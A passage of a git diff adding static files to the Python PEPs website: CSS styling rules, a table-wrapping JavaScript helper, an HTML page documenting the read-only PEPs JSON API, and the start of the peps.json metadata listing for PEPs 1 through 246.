+div.danger, +div.error { + background-color: var(--colour-error); +} +div.warning { + background-color: var(--colour-warning); +} +div.attention, +div.caution { + background-color: var(--colour-caution); +} +div.important { + background-color: var(--colour-attention); +} +div.hint, +div.tip { + background-color: var(--colour-tip); +} + +p.admonition-title { + font-weight: bold; +} + +/* PEP Header / references rules */ +dl.rfc2822, +dl.footnote { + display: grid; + grid-template-columns: fit-content(30%) auto; + width: 100%; +} +dl.footnote { + border-top: 1px solid var(--colour-rule-strong); + line-height: 1.875; +} +dl.rfc2822 > dt, +dl.rfc2822 > dd { + padding: .1rem .3rem .1rem; +} +dl.footnote > dt, +dl.footnote > dd { + padding: .25rem .5rem .2rem; + border-bottom: 1px solid var(--colour-rule-strong); +} +dl.rfc2822 > dt { + text-align: right; +} +dl.footnote > dt { + font-weight: normal; + border-right: 1px solid var(--colour-background); +} +dl.rfc2822 > dd, +dl.footnote > dd { + margin: 0; +} + +/* Sidebar formatting */ +#pep-sidebar { + overflow-y: auto; + position: sticky; + top: 0; + height: 100vh; +} +#pep-sidebar > h2 { + font-size: 1.4rem; +} +#contents ol, +#contents ul, +#pep-sidebar ol, +#pep-sidebar ul { + padding: 0; + margin: 0 0 0 1.5rem; +} +#pep-sidebar ul { + font-size: .9rem; + margin-left: 1rem; +} +#pep-sidebar ul a { + text-decoration: none; +} +#source { + padding-bottom: 2rem; + font-weight: bold; +} + +.reference.external > strong { + font-weight: normal; /* Fix strong links for :pep: and :rfc: roles */ +} + +.visually-hidden { + position: absolute !important; + width: 1px !important; + height: 1px !important; + padding: 0 !important; + margin: -1px !important; + overflow: hidden !important; + clip-path: polygon(0px 0px, 0px 0px,0px 0px, 0px 0px) !important; + white-space: nowrap !important; + border: 0 !important; +} + +/* Sticky banners */ +/* Default styles, sticky for larger screens */ +.sticky-banner { + top: 0; + position: sticky; + z-index: 1; +} + +/* Override for smaller screens, non-sticky */ +@media (max-width: 600px) { + .sticky-banner { + position: static; + padding: 5px; + font-size: 12px; + } +} + +.close-button { + cursor: pointer; + position: absolute; + top: 0; + right: 0; + padding: 0.5em; + font-size: 1.5em; + border: none; + background: transparent; + color: inherit; + margin-top: 0; +} diff --git a/_static/wrap_tables.js b/_static/wrap_tables.js new file mode 100644 index 00000000000..70c0a3a4bc0 --- /dev/null +++ b/_static/wrap_tables.js @@ -0,0 +1,30 @@ +// Wrap the tables in PEP bodies in a div, to allow for responsive scrolling + +"use strict"; + +const pepContentId = "pep-content"; + + +// Wrap passed table element in wrapper divs +function wrapTable (table) { + const wrapper = document.createElement("div"); + wrapper.classList.add("table-wrapper"); + table.parentNode.insertBefore(wrapper, table); + wrapper.appendChild(table); +} + + +// Wrap all tables in the PEP content in wrapper divs +function wrapPepContentTables () { + const pepContent = document.getElementById(pepContentId); + const bodyTables = pepContent.getElementsByTagName("table"); + Array.from(bodyTables).forEach(wrapTable); +} + + +// Wrap the tables as soon as the DOM is loaded +document.addEventListener("DOMContentLoaded", () => { + if (document.getElementById(pepContentId)) { + wrapPepContentTables(); + } +}) diff --git a/api/index.html b/api/index.html new file mode 100644 index 00000000000..5be039aa279 --- /dev/null +++ b/api/index.html @@ -0,0 +1,183 @@ + + + + + + + + PEPs API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEPs API

+

There is a read-only API of published PEPs available at:

+ +

The structure is like:

+
{
+  "<PEP number>": {
+    "number": integer,
+    "title": string,
+    "authors": string,
+    "discussions_to": string | null,
+    "status": "Accepted" | "Active" | "Deferred" | "Draft" | "Final" | "Provisional" | "Rejected" | "Superseded" | "Withdrawn",
+    "type": "Informational" | "Process" | "Standards Track",
+    "topic": "governance" | "packaging" | "release" | "typing" | "",
+    "created": string,
+    "python_version": string | null,
+    "post_history": string,
+    "resolution": string | null,
+    "requires": string | null,
+    "replaces": string | null,
+    "superseded_by": string | null,
+    "url": string
+  },
+}
+
+
+

Date values are formatted as DD-MMM-YYYY, +and multiple dates are combined in a comma-separated list.

+

For example:

+
{
+  "8": {
+    "number": 8,
+    "title": "Style Guide for Python Code",
+    "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan",
+    "discussions_to": null,
+    "status": "Active",
+    "type": "Process",
+    "topic": "",
+    "created": "05-Jul-2001",
+    "python_version": null,
+    "post_history": "05-Jul-2001, 01-Aug-2013",
+    "resolution": null,
+    "requires": null,
+    "replaces": null,
+    "superseded_by": null,
+    "url": "https://peps.python.org/pep-0008/"
+  },
+  "484": {
+    "number": 484,
+    "title": "Type Hints",
+    "authors": "Guido van Rossum, Jukka Lehtosalo, Łukasz Langa",
+    "discussions_to": "python-dev@python.org",
+    "status": "Final",
+    "type": "Standards Track",
+    "topic": "typing",
+    "created": "29-Sep-2014",
+    "python_version": "3.5",
+    "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015",
+    "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html",
+    "requires": null,
+    "replaces": null,
+    "superseded_by": null,
+    "url": "https://peps.python.org/pep-0484/"
+  },
+  "622": {
+    "number": 622,
+    "title": "Structural Pattern Matching",
+    "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin",
+    "discussions_to": "python-dev@python.org",
+    "status": "Superseded",
+    "type": "Standards Track",
+    "topic": "",
+    "created": "23-Jun-2020",
+    "python_version": "3.10",
+    "post_history": "23-Jun-2020, 08-Jul-2020",
+    "resolution": null,
+    "requires": null,
+    "replaces": null,
+    "superseded_by": "634",
+    "url": "https://peps.python.org/pep-0622/"
+  }
+}
+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/api/peps.json b/api/peps.json new file mode 100644 index 00000000000..c7ca20cfcf1 --- /dev/null +++ b/api/peps.json @@ -0,0 +1,11375 @@ +{ + "1": { + "number": 1, + "title": "PEP Purpose and Guidelines", + "authors": "Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "13-Jun-2000", + "python_version": null, + "post_history": "21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, 07-Apr-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0001/" + }, + "2": { + "number": 2, + "title": "Procedure for Adding New Modules", + "authors": "Brett Cannon, Martijn Faassen", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2001", + "python_version": null, + "post_history": "07-Jul-2001, 09-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0002/" + }, + "3": { + "number": 3, + "title": "Guidelines for Handling Bug Reports", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "25-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0003/" + }, + "4": { + "number": 4, + "title": "Deprecation of Standard Modules", + "authors": "Brett Cannon, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0004/" + }, + "5": { + "number": 5, + "title": "Guidelines for Language Evolution", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "26-Oct-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0005/" + }, + "6": { + "number": 6, + "title": "Bug Fix Releases", + "authors": "Aahz, Anthony Baxter", + "discussions_to": null, + "status": "Superseded", + "type": "Process", + "topic": "", + "created": "15-Mar-2001", + "python_version": null, + "post_history": "15-Mar-2001, 18-Apr-2001, 19-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0006/" + }, + "7": { + "number": 7, + "title": "Style Guide for C Code", + "authors": "Guido van Rossum, Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0007/" + }, + "8": { + "number": 8, + "title": "Style Guide for Python Code", + "authors": "Guido van Rossum, Barry Warsaw, Alyssa Coghlan", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Jul-2001", + "python_version": null, + "post_history": "05-Jul-2001, 01-Aug-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0008/" + }, + "9": { + "number": 9, + "title": "Sample Plaintext PEP Template", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "14-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2YMHVPRDWGQLA5A2FKXE2JMLM2HQEEGW/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0009/" + }, + "10": { + "number": 10, + "title": "Voting Guidelines", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Mar-2002", + "python_version": null, + "post_history": "07-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0010/" + }, + "11": { + "number": 11, + "title": "CPython platform support", + "authors": "Martin von L\u00f6wis, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "07-Jul-2002", + "python_version": null, + "post_history": "`18-Aug-2007 `__, `14-May-2014 `__, `20-Feb-2015 `__, `10-Mar-2022 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0011/" + }, + "12": { + "number": 12, + "title": "Sample reStructuredText PEP Template", + "authors": "David Goodger, Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Aug-2002", + "python_version": null, + "post_history": "`30-Aug-2002 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0012/" + }, + "13": { + "number": 13, + "title": "Python Language Governance", + "authors": "The Python core team and community", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "16-Dec-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0013/" + }, + "20": { + "number": 20, + "title": "The Zen of Python", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "19-Aug-2004", + "python_version": null, + "post_history": "22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0020/" + }, + "42": { + "number": 42, + "title": "Feature Requests", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "12-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0042/" + }, + "100": { + "number": 100, + "title": "Python Unicode Integration", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Mar-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0100/" + }, + "101": { + "number": 101, + "title": "Doing Python Releases 101", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "22-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "102", + "superseded_by": null, + "url": "https://peps.python.org/pep-0101/" + }, + "102": { + "number": 102, + "title": "Doing Python Micro Releases", + "authors": "Anthony Baxter, Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "09-Jan-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "101", + "url": "https://peps.python.org/pep-0102/" + }, + "103": { + "number": 103, + "title": "Collecting information about git", + "authors": "Oleg Broytman", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "01-Jun-2015", + "python_version": null, + "post_history": "12-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0103/" + }, + "160": { + "number": 160, + "title": "Python 1.6 Release Schedule", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "25-Jul-2000", + "python_version": "1.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0160/" + }, + "200": { + "number": 200, + "title": "Python 2.0 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0200/" + }, + "201": { + "number": 201, + "title": "Lockstep Iteration", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "27-Jul-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0201/" + }, + "202": { + "number": 202, + "title": "List Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0202/" + }, + "203": { + "number": 203, + "title": "Augmented Assignments", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "14-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0203/" + }, + "204": { + "number": 204, + "title": "Range Literals", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0204/" + }, + "205": { + "number": 205, + "title": "Weak References", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.1", + "post_history": "11-Jan-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0205/" + }, + "206": { + "number": 206, + "title": "Python Advanced Library", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "14-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0206/" + }, + "207": { + "number": 207, + "title": "Rich Comparisons", + "authors": "Guido van Rossum, David Ascher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0207/" + }, + "208": { + "number": 208, + "title": "Reworking the Coercion Model", + "authors": "Neil Schemenauer, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0208/" + }, + "209": { + "number": 209, + "title": "Multi-dimensional Arrays", + "authors": "Paul Barrett, Travis Oliphant", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "03-Jan-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0209/" + }, + "210": { + "number": 210, + "title": "Decoupling the Interpreter Loop", + "authors": "David Ascher", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0210/" + }, + "211": { + "number": 211, + "title": "Adding A New Outer Product Operator", + "authors": "Greg Wilson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0211/" + }, + "212": { + "number": 212, + "title": "Loop Counter Iteration", + "authors": "Peter Schneider-Kamp", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0212/" + }, + "213": { + "number": 213, + "title": "Attribute Access Handlers", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0213/" + }, + "214": { + "number": 214, + "title": "Extended Print Statement", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.0", + "post_history": "16-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0214/" + }, + "215": { + "number": 215, + "title": "String Interpolation", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "292", + "url": "https://peps.python.org/pep-0215/" + }, + "216": { + "number": 216, + "title": "Docstring Format", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "31-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "287", + "url": "https://peps.python.org/pep-0216/" + }, + "217": { + "number": 217, + "title": "Display Hook for Interactive Use", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0217/" + }, + "218": { + "number": 218, + "title": "Adding a Built-In Set Object Type", + "authors": "Greg Wilson, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0218/" + }, + "219": { + "number": 219, + "title": "Stackless Python", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "14-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0219/" + }, + "220": { + "number": 220, + "title": "Coroutines, Generators, Continuations", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "14-Aug-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0220/" + }, + "221": { + "number": 221, + "title": "Import As", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0221/" + }, + "222": { + "number": 222, + "title": "Web Library Enhancements", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2000", + "python_version": "2.1", + "post_history": "22-Dec-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0222/" + }, + "223": { + "number": 223, + "title": "Change the Meaning of ``\\x`` Escapes", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2000", + "python_version": "2.0", + "post_history": "23-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0223/" + }, + "224": { + "number": 224, + "title": "Attribute Docstrings", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0224/" + }, + "225": { + "number": 225, + "title": "Elementwise/Objectwise Operators", + "authors": "Huaiyu Zhu, Gregory Lielens", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0225/" + }, + "226": { + "number": 226, + "title": "Python 2.1 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "16-Oct-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0226/" + }, + "227": { + "number": 227, + "title": "Statically Nested Scopes", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0227/" + }, + "228": { + "number": 228, + "title": "Reworking Python's Numeric Model", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Nov-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0228/" + }, + "229": { + "number": 229, + "title": "Using Distutils to Build Python", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0229/" + }, + "230": { + "number": 230, + "title": "Warning Framework", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2000", + "python_version": "2.1", + "post_history": "05-Nov-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0230/" + }, + "231": { + "number": 231, + "title": "__findattr__()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0231/" + }, + "232": { + "number": 232, + "title": "Function Attributes", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2000", + "python_version": "2.1", + "post_history": "20-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0232/" + }, + "233": { + "number": 233, + "title": "Python Online Help", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0233/" + }, + "234": { + "number": 234, + "title": "Iterators", + "authors": "Ka-Ping Yee, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2001", + "python_version": "2.1", + "post_history": "30-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0234/" + }, + "235": { + "number": 235, + "title": "Import on Case-Insensitive Platforms", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Feb-2001", + "python_version": "2.1", + "post_history": "16-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0235/" + }, + "236": { + "number": 236, + "title": "Back to the __future__", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2001", + "python_version": "2.1", + "post_history": "26-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0236/" + }, + "237": { + "number": 237, + "title": "Unifying Long Integers and Integers", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 14-Aug-2001, 23-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0237/" + }, + "238": { + "number": 238, + "title": "Changing the Division Operator", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 26-Jul-2001, 27-Jul-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0238/" + }, + "239": { + "number": 239, + "title": "Adding a Rational Type to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0239/" + }, + "240": { + "number": 240, + "title": "Adding a Rational Literal to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0240/" + }, + "241": { + "number": 241, + "title": "Metadata for Python Software Packages", + "authors": "A.M. Kuchling", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Mar-2001", + "python_version": null, + "post_history": "`19-Mar-2001 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "314", + "url": "https://peps.python.org/pep-0241/" + }, + "242": { + "number": 242, + "title": "Numeric Kinds", + "authors": "Paul F. Dubois", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Mar-2001", + "python_version": "2.2", + "post_history": "17-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0242/" + }, + "243": { + "number": 243, + "title": "Module Repository Upload Mechanism", + "authors": "Sean Reifschneider", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2001", + "python_version": "2.1", + "post_history": "20-Mar-2001, 24-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0243/" + }, + "244": { + "number": 244, + "title": "The ``directive`` statement", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Mar-2001", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0244/" + }, + "245": { + "number": 245, + "title": "Python Interface Syntax", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2001", + "python_version": "2.2", + "post_history": "21-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0245/" + }, + "246": { + "number": 246, + "title": "Object Adaptation", + "authors": "Alex Martelli, Clark C. Evans", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2001", + "python_version": "2.5", + 